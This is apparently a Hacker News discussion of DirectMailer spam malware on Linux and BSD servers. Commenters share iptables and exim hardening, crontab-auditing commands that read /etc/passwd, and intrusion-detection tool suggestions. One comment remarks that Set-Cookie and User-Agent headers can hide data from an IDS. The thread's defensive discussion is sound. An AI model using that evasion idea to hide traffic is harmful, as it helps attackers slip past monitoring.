
Unnoticed for years, malware turned Linux and BSD servers into spamming machines - wglb
http://www.net-security.org/malware_news.php?id=3030
======
ars
You can prevent this kind of thing, or at least make it easier to keep track
of.

Add these rules to your iptables firewall:

    
    
        -A OUTPUT -m owner --uid-owner Debian-exim -p tcp --dport 25 -j ACCEPT
        -A OUTPUT -p tcp -d 127.0.0.1 --dport 25 -j ACCEPT
        -A OUTPUT -p tcp --dport 25 -m state --state RELATED,ESTABLISHED -j ACCEPT
        -A OUTPUT -p tcp --dport 25 -j LOG --log-level debug --log-uid --log-prefix "smtp_block "
        -A OUTPUT -p tcp --dport 25 -j REJECT
    

This blocks anyone except exim from sending email. (Note these rules are not
tested with IPv6.)

Then, keep a log of every outgoing email, by adding in
/etc/exim/exim4.conf.template:

After:

    
    
        begin routers
    

Add:

    
    
        traffic_tap:
          unseen
          no_expn
          no_verify
          transport = local_copy
          driver = accept
    

After:

    
    
        begin transports
    

Add:

    
    
        local_copy:
          driver = appendfile
          delivery_date_add
          envelope_to_add
          return_path_add
          maildir_format = true
          create_directory = true
          directory = /var/log/mail_archive/$tod_logfile/
    

Create /var/log/mail_archive with write access for Debian-exim

Obviously these rules are for exim on Debian, but you can use the ideas for
other systems.

~~~
crypt1d
Not that there is anything particularly wrong with this, but I find it silly
that one should make such customization on their box just to prevent _one_
potential malware hazard. There are hundred other ways that an infected
machine can be abused, so IMHO prevention should be done based on attack
vectors - that is stopping the machine from getting infected in the first
place.

~~~
ars
It's not to prevent just one malware. Virtually all malware (on servers) these
days has just one goal: send spam. Plus outbound spam has a very visible and
detrimental impact on your reputation so warrants extra defense.

~~~
verroq
Spam AND DDOS.

------
rsync
Why is the headline "Linux and BSD" servers when the exploit here is some
weird mail software called "DirectMailer" and Joomla/Wordpress ?

There's never been any confusion about the risks of installing big monster
bloatware PHP systems on your servers - your eventual owning is a "when, not
if" proposition.

A unix server running "DirectMailer" is like a desktop system running the Ask!
Toolbar. Pure cluelessness.

~~~
ldd
I find these types of headlines very clever: it's click-bait, for sure, but
you and I clicked it because we honestly thought there was some sort of nasty
exploit out there.

Linux is not safe from exploits or hacks but it wants you to be a responsible
adult. You need to update your software frequently, make sure you know what
you are installing and what you are doing.

Ultimately, I think we need to move away from the marketing gimmicks that cry
"ZOMG Z has no viruses and Y has so many and if you get anything it's your OS'
fault" to a "be responsible and reasonable. Your OS is a tool".

------
rurban
Unnoticed? The DarkMailer/YellSOFT DirectMailer Spamware is known for years.
See this post from 2009 how to fight it:

[https://www.atomicorp.com/forum/viewtopic.php?f=3&t=3352](https://www.atomicorp.com/forum/viewtopic.php?f=3&t=3352)

But thanks for the nice analysis.

------
baudehlo
I wouldn't say unnoticed. Security researchers have known about DM for years.
It's one of the most annoying pieces of malware to convince people they have
because they don't think Linux can be infected.

------
jc22
"We do not know if the paid-for version of DirectMailer also include the
backdoor or not."

I wonder if the paid-for version actually exists or if the whole site is just
a setup for spreading the malware, by getting people to download the
supposedly cracked version. I can't imagine a lot of folks are spending $240
to download spam software from some shady website.

~~~
detaro
Exploit kits, buying access to botnets, ... are a thing, so I wouldn't be
surprised if it is real.

------
Hello71
[https://www.reddit.com/r/technology/comments/34m5d5/unnotice...](https://www.reddit.com/r/technology/comments/34m5d5/unnoticed_for_years_malware_turned_linux_and_bsd/)

top comment:

> If it was unnoticed for years then the sysadmins were shit. Why is this
> newsworthy?

>

> Any sysadmin worth their salt will be monitoring the systems they manage.
> This thing made outgoing connections every 15 minutes using a cron job. Any
> 15 year old can create "malware" like this. If you do not notice this for
> years, you shouldn't be allowed to manage servers.

~~~
sliverstorm
What would your monitoring strategy of choice be to notice these things, for a
small "hobby" server?

I've apprenticed as a junior sysadmin in the past, and I can easily see how a
professional operation would detect or prevent this by design. But a lot of
those methods are more than a little over the top for a one-of, single-user,
low-end VPS.

~~~
noinsight
I agree that this is a problem and I've been researching this for some time
now.

Ideally you would want a HIDS system for small deployments (i.e. a single
server) but there doesn't seem to exist too many of those and there's little
information about them online (as far as I can find). OSSEC is one example but
I'm not convinced it installs too cleanly. At least FreeBSD has a package for
it however. Actual configuration would be a mystery.

I think information about this sort of stuff (intrusion detection) seems to be
hard to come by in general. At least stuff that is written by knowledgeable
people. I haven't seen much about it from major vendors either - it seems to
be a black box kind of technology.

I'd love to have a "lightweight" simple daemon that does this. I guess ideally
you would monitor logs for stuff, user and group modifications, cron additions
etc.

~~~
detaro
tripwire, rkhunter, ... are relatively simple options.

And then hope that your configuration prevents the attacker from getting root
or if they do, then they/their automated scripts are not prepared to break
them.

~~~
noinsight
RE: hashing files and whatnot:

FreeBSD with a high enough securelevel allows you to set files append-only or
immutable so that not even root can touch them.

But then updating the index becomes problematic, you would need to create
delta files (which themselves are also immutable) that contain the changed
information and combine the data.

Even then, I'm not convinced you could get that much valuable information from
a full filesystem hash (or whatever) scan. The amount of information would
probably be overwhelming. You would need to apply heuristics or filters.
Checking filetypes with libmagic would work, mostly. You could only alert on
new executables or whatever, etc..

------
xrstf
My takeaway from this: `Set-Cookie` and `User-Agent` headers are great places
to hide stuff and sneak it by IDS.

------
phillipwills
Quickly check crontabs for all users on your systems:

cat /etc/passwd | cut -f1 -d":" | while read line ; do sudo crontab -u $line
-l ; done

~~~
LukeShu
Or more simply:

    
    
        sudo grep -r ^ /var/spool/cron
    

(users' crontab are just /var/spool/cron/$username)

------
markbnj
Wow, brilliant. Complete speculation, of course, but it is almost as if the
owners of DirectMailer set out to troll for the trivially corruptible, and
then play them.

------
DominikD
This paper states "BSD" all over the place and only in a small code snippet
reveals it's FreeBSD specifically. I understand this type of simplification
for the purpose of the title but publication itself, which (I'd assume) is
targeted at tech savvy people, should be pretty open about the BSD family
affected.

------
jingo
Relies on DNS.

